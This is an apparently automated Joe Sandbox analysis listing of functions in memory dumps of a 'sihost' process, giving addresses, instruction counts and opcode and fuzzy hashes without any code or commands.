Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 439a161c25c6f97212b3e20f933ba33ebe1955f4532a367cec08ee9e5032bf77
Instruction ID: bb59bf53a06e8fe9a83597bd12ada9ee9df7e4193abf243f6b68f13d73c6b9c4
Opcode Fuzzy Hash: 439a161c25c6f97212b3e20f933ba33ebe1955f4532a367cec08ee9e5032bf77
Instruction Fuzzy Hash: AEE01A7194E7C44FCB1AEB74887A8457FA0AE6B21178B41EEC185CF1B7E62D8849C701

Function 00007FFD9B8E80D9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9B8E80F6

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 36c05cc9a15a0277e0f45b5224c63ca601942e71f12ea82a8c8bd8277e7dfeb3
Instruction ID: 01cd4a70eb50a88b8644def54af33052de862444ee935cbafdc41739a9795731
Opcode Fuzzy Hash: 36c05cc9a15a0277e0f45b5224c63ca601942e71f12ea82a8c8bd8277e7dfeb3
Instruction Fuzzy Hash: 26E01A7154E7C44FCB1AEB7488698457FA0AE6B21078B40EEC189CF1B3E62D9849C701

Function 00007FFD9B8C07E6 Relevance: .8, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c468f692d2f042640ab5ddcd282ab29923d57bff79b3dba140f72ca6ff3141d8
Instruction ID: 7afcf4332600597b7c465924a350a5c4e08cbd28b4f4328aa144724d5e776f9d
Opcode Fuzzy Hash: c468f692d2f042640ab5ddcd282ab29923d57bff79b3dba140f72ca6ff3141d8
Instruction Fuzzy Hash: EF42C671F1995E4FEBA8FB6884A56B473D2FF58340F0545BAD00EC32E7DE2469428B81

Function 00007FFD9B8E393D Relevance: .3, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30458dea33011e4010adbcfeeb446795cdae78bf5a0ac0c97db5a3563a5ab9e
Instruction ID: 57f8237ac6907f48f868a44713b5b3c146e1f85a2419f2cf157e6ef0d5ca229c
Opcode Fuzzy Hash: c30458dea33011e4010adbcfeeb446795cdae78bf5a0ac0c97db5a3563a5ab9e
Instruction Fuzzy Hash: 1181F361B1DA4E0FEBACFB5884766B473D2EF98350F4542B9D40EC32D7ED28AD428641

Function 00007FFD9B8C1045 Relevance: .3, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955b358f11b48badb5fe5f9cfd0ebdd92d8cac4002c3e44e8d41bcc4597dc2e7
Instruction ID: bb680fcf56f7ba8a3ac465bbb7501726a0a32fb871bff54ecc1341ec73cbe170
Opcode Fuzzy Hash: 955b358f11b48badb5fe5f9cfd0ebdd92d8cac4002c3e44e8d41bcc4597dc2e7
Instruction Fuzzy Hash: 5B91A471F1D90A4BE7ACFB6894A5A7873A1FF98340F0145BAD01EC31D7DD38A9428B81

Function 00007FFD9B8E3993 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e51353733b5c06c9131f52dd93b2532ee7d353aa9083a9fe229ff019747fb5
Instruction ID: 31420b436fbf1be887e675086c968283cdd20f67084d5ce9aad578ab47a1eb24
Opcode Fuzzy Hash: c0e51353733b5c06c9131f52dd93b2532ee7d353aa9083a9fe229ff019747fb5
Instruction Fuzzy Hash: 1961A221B1D94E4FEBACFBA884766B972D2EF98340F4541BAD40EC31D7ED28AD814741

Function 00007FFD9B8E7080 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f55f263ccbdb3f0973a2ab637b3601e1bf3364178bf111121993d22054fd7e
Instruction ID: daac6724ddfc4130fa3b7deeab7d2b7a440628276af9d71683dbb293381e6a5e
Opcode Fuzzy Hash: 38f55f263ccbdb3f0973a2ab637b3601e1bf3364178bf111121993d22054fd7e
Instruction Fuzzy Hash: BD41C667B0A5758AE31EB7ACB8BA8E93790DF0123D70846B3D19D8A0D7EC1854879285

Function 00007FFD9B8B0C25 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c40e451d49f30d77a60974ae8365a03a79b406777e7a360b3593b160530e6d
Instruction ID: f1c1c8110a6cc4c9fa734a1837d8a2925f3e2ce41c20e6fe778c12c5d2820ceb
Opcode Fuzzy Hash: f4c40e451d49f30d77a60974ae8365a03a79b406777e7a360b3593b160530e6d
Instruction Fuzzy Hash: F3313831B1D26D8EE726ABB998751EC7B60EF46314F1541B7D0488B1E3DA3826468BC1

Function 00007FFD9B8B11A1 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c052e1e28baf6a701a7137a80e3a5acb6dfd1dff6a1f85a96ef0c27a493ccb1
Instruction ID: 4b3f098dcd35381ced976f81795296330c9f9a5e4499a85eaf61717f2995e2f3
Opcode Fuzzy Hash: 2c052e1e28baf6a701a7137a80e3a5acb6dfd1dff6a1f85a96ef0c27a493ccb1
Instruction Fuzzy Hash: 9031A830A1965E8FDB49EB74C8659B97BF0FF5A300B0505FAC019DB1B2DA389945CB50

Function 00007FFD9B8E70F8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5161f5e871c0f6b2da623ae8675a532cabe9b7afcbbec86a6c27edd1504fac
Instruction ID: 5ba2bbf51a0b05e6b7742dd40b064b1260b04f5abba32d4ac6ce28a51c11f02b
Opcode Fuzzy Hash: 4e5161f5e871c0f6b2da623ae8675a532cabe9b7afcbbec86a6c27edd1504fac
Instruction Fuzzy Hash: 3721F816B0A67286D71E77A8B8AA8E83B90DF0133D70842B3E09D8B0D7EC0950C75285

Function 00007FFD9B8C478C Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dda868ea643c9ee37182c73fdae0ee793c2bf559973601cf28488c995733bfd
Instruction ID: e65a9ee574f21485af4bf4c5e58493db278d42e8dedc9df2d48f280e502bd505
Opcode Fuzzy Hash: 2dda868ea643c9ee37182c73fdae0ee793c2bf559973601cf28488c995733bfd
Instruction Fuzzy Hash: C431D16290E7DC4FD7629B688C606A63FB0EF47310F0A41EBD089CB1F3C928594AC791

Function 00007FFD9B8E29BA Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45a7b37c04f14299ec6819edd5d26a7cc286cec1ed5f2afc1d7e11333958ac89
Instruction ID: 4426137274424249038d50831172bf3c20867cab72cce431d393f39f4d2933f0
Opcode Fuzzy Hash: 45a7b37c04f14299ec6819edd5d26a7cc286cec1ed5f2afc1d7e11333958ac89
Instruction Fuzzy Hash: B4114672B0D91D8FEBACFF88D4646A833D1EB98750F150676D419D3295CD28AD418781

Function 00007FFD9B8E7148 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c12fca49ff70dc2b5186a1320fe5277296be45ff09ca2ba9455a580fa8e703
Instruction ID: e26cc3258778cf9754c2e4b9d9b46e7518be55a409b93ddb129a9ecc040466a2
Opcode Fuzzy Hash: d6c12fca49ff70dc2b5186a1320fe5277296be45ff09ca2ba9455a580fa8e703
Instruction Fuzzy Hash: CD01D816B0A67187D71D77ACBCAA8E43790DF0122D70842F3E05D8B0D7EC5954879285

Function 00007FFD9B8B0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79c7df014a082685d9537226e7eaf0704b5f980a557ca5d4a6b98dd67b5b4ff
Instruction ID: 47216ed694dcc2977b02178069ab35b5f515cdf2a26445e8dfab1483add63ecf
Opcode Fuzzy Hash: f79c7df014a082685d9537226e7eaf0704b5f980a557ca5d4a6b98dd67b5b4ff
Instruction Fuzzy Hash: 9011E531E1E29D8FE712DBB9886509C7FB0EF06710F1641F7C044DB1A2D63866458BC0

Function 00007FFD9B8ED151 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4fab9c9acf5f0249320b971406988ce6e53ada09f4f1303461008043abcca4
Instruction ID: 77334b53bbc658ddec7b07ea3d6a1865dc5d94a3c63e7b2478883aff64dc7be5
Opcode Fuzzy Hash: 8f4fab9c9acf5f0249320b971406988ce6e53ada09f4f1303461008043abcca4
Instruction Fuzzy Hash: B8F02B22B0E68A1FF73AA39999B01B4BB50EBD9360F0542B3C495C71E3D80C1A9A4351

Function 00007FFD9B8C46F1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98b1a05394d181939fc07f69edcac0ab1382392e30c1441956d9a90cd5d93f3
Instruction ID: d35d8cad3fa5b03b81b0ce8603a7bfd2a34eded91d23bf872e8782552decf8c2
Opcode Fuzzy Hash: a98b1a05394d181939fc07f69edcac0ab1382392e30c1441956d9a90cd5d93f3
Instruction Fuzzy Hash: FCF04921B0EA8D8FE371A36484202B43791AB96321F1E027BC089C70E3DD1C56854381

Function 00007FFD9B8ED88E Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808227f4dc88a8cc34f0189cd0f9f922e7c5d6137bf7460ed4681de06691be39
Instruction ID: e28a755c659de8a5706b8a1d4b3150ce4a0f4ae76369005249e39f6d45771aa9
Opcode Fuzzy Hash: 808227f4dc88a8cc34f0189cd0f9f922e7c5d6137bf7460ed4681de06691be39
Instruction Fuzzy Hash: 2A019231F0951E8FEB69E79D98503F973E2EF98311F114435D008871D5DA39AD8ACB41

Function 00007FFD9B8C849F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e14a779c4c64a01f748cf3c051ae8cc73bdd820b5342db5a9671ad595dcbc3
Instruction ID: abbedcdf6cce14e9410639e5f28e189331d657d70cab264160e976639c035346
Opcode Fuzzy Hash: 10e14a779c4c64a01f748cf3c051ae8cc73bdd820b5342db5a9671ad595dcbc3
Instruction Fuzzy Hash: A0F0F471A0555F8FE710AB6088569F83361EF05314F1542B7C918D72E6EE38AA4186C0

Function 00007FFD9B8E3669 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec7b94a2c782dbfa415f0b91548691c7daf0e93afc635c960a52c5b098e50ea
Instruction ID: 8e7ccad50ec6e009fda4b6e907dcb23138eb69432b210b9c48f7ca7a55027f5a
Opcode Fuzzy Hash: fec7b94a2c782dbfa415f0b91548691c7daf0e93afc635c960a52c5b098e50ea
Instruction Fuzzy Hash: A4F02730B18BC84FC7059B288825025BBF1EFAA60174906EBD086C73B2DA28EC458342

Function 00007FFD9B8C3F98 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9158078daa0b9294c0a35ebd5be8e1eaa1aeb99621429eaaea7cc38a9ca13652
Instruction ID: 3897f77aa9319afcb9efb820b8c73b39a472b3e3d9a41fafd105abccc48012b6
Opcode Fuzzy Hash: 9158078daa0b9294c0a35ebd5be8e1eaa1aeb99621429eaaea7cc38a9ca13652
Instruction Fuzzy Hash: F2F04471A1460E8BF754EB44C8656BD77B1FB54350F014537C419D72A5DF749A428780

Function 00007FFD9B8E25E8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a651a285739add4ced1f2927a9229ac58ff63b9bd9960a91a31756ec143b21
Instruction ID: 4a027a6b04f3550d49520425e885d2909222f20a3c92b1e0c0d373e6bb3f8f34
Opcode Fuzzy Hash: a6a651a285739add4ced1f2927a9229ac58ff63b9bd9960a91a31756ec143b21
Instruction Fuzzy Hash: DCE02634B24F4C4B8B18AA2D9405072F3D1EBAD206B000A7EA48BD3360DE20FC414785

Function 00007FFD9B8E34A9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826c2b26349c5e6220dc6552cc5a49448c9233b0e129ebeeb43c06704679403c
Instruction ID: a7a695bbdbdfc66db6bbee8dd24d621aec51d431d8d1d88ec16f45bd77af9d90
Opcode Fuzzy Hash: 826c2b26349c5e6220dc6552cc5a49448c9233b0e129ebeeb43c06704679403c
Instruction Fuzzy Hash: 44E01220709B884FC70EA62948695657BB1EFBB21278A52DBC045CB6A3ED19DC89C741

Function 00007FFD9B8ED26D Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0adea1aa68b32745a182d4a8116f69d5046b1d6f3b0668657eaa7d8274ffc1
Instruction ID: 4eb87f46b0950b89e406da387bc4a7ed28c58b11c2fa31601fcbdc348fa6ed61
Opcode Fuzzy Hash: 6c0adea1aa68b32745a182d4a8116f69d5046b1d6f3b0668657eaa7d8274ffc1
Instruction Fuzzy Hash: F1F03031B0A50E9BE779E784C4B4BB87285DB9C361F125236D51A871F1CE2C6A988740

Function 00007FFD9B8ED1E1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b86c65602983a3bbc0481a840c09f68985226a701b28dfa3ed9a5967d07c2f2
Instruction ID: 88dadc125bfb63f5a325a87d3ae911fcfaa2ebcd7a53d5862b66597da44cd4ba
Opcode Fuzzy Hash: 0b86c65602983a3bbc0481a840c09f68985226a701b28dfa3ed9a5967d07c2f2
Instruction Fuzzy Hash: B4F03735B0950F9BE779E790C4A0BB872D5DB9C311F514235D51A871E1CE2C66984740

Function 00007FFD9B8B0CB9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ebe2a36b072beae797628a492d66bc5cdf52f548f82712b599b6e36bd15d4d
Instruction ID: ee8cfebe02d4c4deff128156aa1c7aa6778b741bb42b06f982e18e8a548bd0e4
Opcode Fuzzy Hash: 13ebe2a36b072beae797628a492d66bc5cdf52f548f82712b599b6e36bd15d4d
Instruction Fuzzy Hash: 8EF0BE30B1A60ACFF728DBA5C4A47E9B7A0EF54700F1442B6D009872E5DB7866C4CF80

Function 00007FFD9B8E2239 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b4424197aa66210bfa091ab0715fae5376f8873f102b28919ffccfbb5ced88
Instruction ID: 98d78f80ebd4ad51cf599c28ec735bfd5220a6d02066bdde08777f8c60700f44
Opcode Fuzzy Hash: 19b4424197aa66210bfa091ab0715fae5376f8873f102b28919ffccfbb5ced88
Instruction Fuzzy Hash: 04E0653160E3C04FC716DB348468854BF60EF6720174A42EEC045CF1A3DA2DCC85CB11

Function 00007FFD9B8E7C49 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a9a166f02bffdd55fd0b6ceae8cfb2d0a145115bc082fdc3c871a11da5b5142
Instruction ID: 4c647354763dfb64eb908ed86db950c54308a823be309b405cae778971a3613b
Opcode Fuzzy Hash: 4a9a166f02bffdd55fd0b6ceae8cfb2d0a145115bc082fdc3c871a11da5b5142
Instruction Fuzzy Hash: B2E04661A4EBC04FC70A67348C698943FB09F6B21278A00EBD045CF2B3EA1DDC88C712

Function 00007FFD9B8EDAA9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bfd65ba4650870df4be14f3a1d5e92f90259553e06e31dd39aefd0328731ec7
Instruction ID: 5a7cd4fd212220497b5f25f85bd050a17c3644904ca12d495fe49cc95f0e42ad
Opcode Fuzzy Hash: 2bfd65ba4650870df4be14f3a1d5e92f90259553e06e31dd39aefd0328731ec7
Instruction Fuzzy Hash: D9E01A6198F7C44FC70B9B3588B88403F71AE5761074A51EAC085CF5B3D91A9949C701

Function 00007FFD9B8C5268 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff27a4a8187f2ee7b7fd26377aebda4a00a9eeb4457e11323b16016b7af08d1
Instruction ID: 7840305e564d9e5b0b7e126ca25755b9c13f0fd1fceab092578c795fe5192c9e
Opcode Fuzzy Hash: 4ff27a4a8187f2ee7b7fd26377aebda4a00a9eeb4457e11323b16016b7af08d1
Instruction Fuzzy Hash: 7DD05E30B6094D4B8B0CA62D8458570B3D1E7AA2167D45379940BC2291ED25EDC68B80

Function 00007FFD9B8EA450 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8EA3C0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8C3BB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FFD9B8E9269 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959381bc829d19c02cc4cdb2e5f9367b6590e096b2e6423345e39be0f9a5b7ea
Instruction ID: 33e498d0803e1f2d6eb8287d16e6a06a02e6deae3d8a6ce220b5c9718715b62b
Opcode Fuzzy Hash: 959381bc829d19c02cc4cdb2e5f9367b6590e096b2e6423345e39be0f9a5b7ea
Instruction Fuzzy Hash: 99E0173151A7884FC70BAB3488A99903FB0EE2B21178B01C7D049CF5B3E6298D8DC752

Function 00007FFD9B8EDA29 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3cb11bc3e183a89ef8fe1d6b046b14092b705e180098e1d6daa8e3d4d6755e
Instruction ID: 5570a488ced718ece2c0852c96150aa7c9eba369672db4f144326865d8058010
Opcode Fuzzy Hash: da3cb11bc3e183a89ef8fe1d6b046b14092b705e180098e1d6daa8e3d4d6755e
Instruction Fuzzy Hash: 45E04F2294F7C04FCB0BA73488788447F60EF1721478A41EAC085CF1B3EA298D49C701

Function 00007FFD9B8E22E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

